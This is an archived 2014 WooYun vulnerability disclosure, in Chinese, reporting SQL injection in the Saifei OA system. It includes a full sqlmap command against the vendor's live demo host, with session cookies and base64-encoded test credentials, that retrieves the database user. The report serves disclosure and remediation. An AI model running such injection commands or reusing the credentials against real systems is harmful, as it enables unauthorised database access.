漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-075953
漏洞标题:赛飞OA系统前台注入三枚
相关厂商:赛飞软件
漏洞作者: D_in
提交时间:2014-09-15 17:02
修复时间:2014-12-14 17:04
公开时间:2014-12-14 17:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-20: 厂商已经确认,细节仅向厂商公开
2014-09-23: 细节向第三方安全合作伙伴开放
2014-11-14: 细节向核心白帽子及相关领域专家公开
2014-11-24: 细节向普通白帽子公开
2014-12-04: 细节向实习白帽子公开
2014-12-14: 细节向公众公开
简要描述:
赛飞OA系统注入,需登录,影响很大,官网版本为5+已经注入成功,求大厂商
详细说明:
官网:http://www.slssoft.com/
百度百科:http://baike.baidu.com/view/5222614.htm?fr=aladdin
官网demo:http://oa.isoffice.cn/
客户众多:http://www.slssoft.com/Web/Index/WebDetail/customer
第一处注入点搜索型的sql注入
注入点在个人信息搜索处
数据库版本
上sqlmap
注入语句:
sqlmap -u "http://oa.isoffice.cn/StudyInfo/PersionInfoList.aspx" --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTg1MjkyNjMzMQ8WBB4IU29ydEluZm8FCEVkaXRUaW1lHghTb3J0RGVzYwUEZGVzYxYCZg9kFhRmDxBkZBYBZmQCAQ8PZBYCHglvbmtleWRvd24FHlN1Ym1pdEtleUNsaWNrKCdJbWdCdXRRdWVyeScpO2QCAw88KwALAgAPFgoeCFBhZ2VTaXplAgoeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGYWBB4Ib2xkVmFsdWUFByNmMGYwZjAeC3NpbmdsZVZhbHVlBQcjZmZmZmZmAxYEHglCYWNrQ29sb3IJxsbG%2Fx4EXyFTQgIIZAIFDw9kFgIeB29uY2xpY2sFVWphdmFzY3JpcHQ6e2lmKGNvbmZpcm0oJ%2BehruWumuWIoOmZpOaJgOaciemAieS4reS%2FoeaBr%2BWQl%2B%2B8nycpPT1mYWxzZSkgcmV0dXJuIGZhbHNlO31kAgYPD2QWAh8MBVhqYXZhc2NyaXB0OntpZihjb25maXJtKCfnoa7lrprlj5HluIPmiYDpgInkv6Hmga%2Foh7Ppl6jmiLflkJfvvJ8nKT09ZmFsc2UpIHJldHVybiBmYWxzZTt9ZAIHDxAPFgYeDURhdGFUZXh0RmllbGQFCkNvbHVtbk5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJRB4LXyFEYXRhQm91bmRnZBAVEwzlm73lpJbkvJrorq4M5Zu95YaF5Lya6K6uBUlU55WMBumAmuS%2FoQnkupLogZTnvZEG56eR5oqABuWfuumHkQbogqHnpagG5L2T6IKyBuWRqOWIigbor4TorroG5LiT6aKYBuaXtuaUvwzlhazlkYrkuK3lv4MM5Lq65paH6aOO6YeHDOWFrOWKoeWFrOW8gAblhazlkYoG5paw6Ze7EC0t5omA5pyJ5qCP55uuLS0VEwIyNQIyNAIyMwIyMgIyMQIyMAIxOAIxNwIxNQIxNAIxMwIxMgIxMQIxMAE0ATMBMgExATAUKwMTZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAggPDxYCHgRUZXh0BQEwZGQCCQ8PFgIfEAUBMWRkAgoPDxYCHxAFATFkZAILD2QWBmYPD2QWAh8CBRhTdWJtaXRLZXlDbGljaygnbG5rT0snKTtkAgEPD2QWAh8MBS1yZXR1cm4gU0ZEYXRhR3JpZF9TZXRQYWdlU2l6ZSgnRGF0YUdyaWRJbmZvJylkAgIPD2QWAh8MBTByZXR1cm4gU0ZEYXRhR3JpZF9DYW5jZWxQYWdlU2l6ZSgnRGF0YUdyaWRJbmZvJylkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQtJbWdCdXRRdWVyeQ%3D%3D&DDLIsShow=0&txtStudyName=&ImgButQuery.x=28&ImgButQuery.y=14&DDLWebColumn=0&txtDataGridInfoPageSize=10" --cookie "ASP.NET_SessionId=gvotfi5dgouklugb44jj4mku; UserName=dGVzdA%3D%3D%26; UserPwd=c29mZmljZQ%3D%3D%26; SFOAUserCode=test; SFOAUserName=%b2%e2%ca%d4%d3%c3%bb%a7; SFOADeptName=%be%ad%c0%ed%b0%ec; SFOADeptID=1; SFOAWorker=%d7%dc%be%ad%c0%ed; SFOARoleID=81; SFOASysManager=; SFOAStyle=new; SFOAUserIkey=false; SFOAHeadColorR=198; SFOAHeadColorG=198; SFOAHeadColorB=198; SFOAMidColor=%23f0f0f0; SFOAMoveColor=%23e7e7e7; SFOAIPAddress=180.136.206.40; PageIndex=1; OrderInfo=; SFOA16Color=%23c6c6c6" -p "txtStudyName" --current-user
textStudyName参数存在sql注入
当前用户名sa
当前数据库:
数据库中的表名
第二处注入在另外一个搜索处
在公共知识信息搜索处
第三处注入
注入语句:
参数CName存在注入,需带上cookie
当前数据库用户名
当前数据库名
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 D_in@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-09-20 13:45
厂商回复:
最新状态:
暂无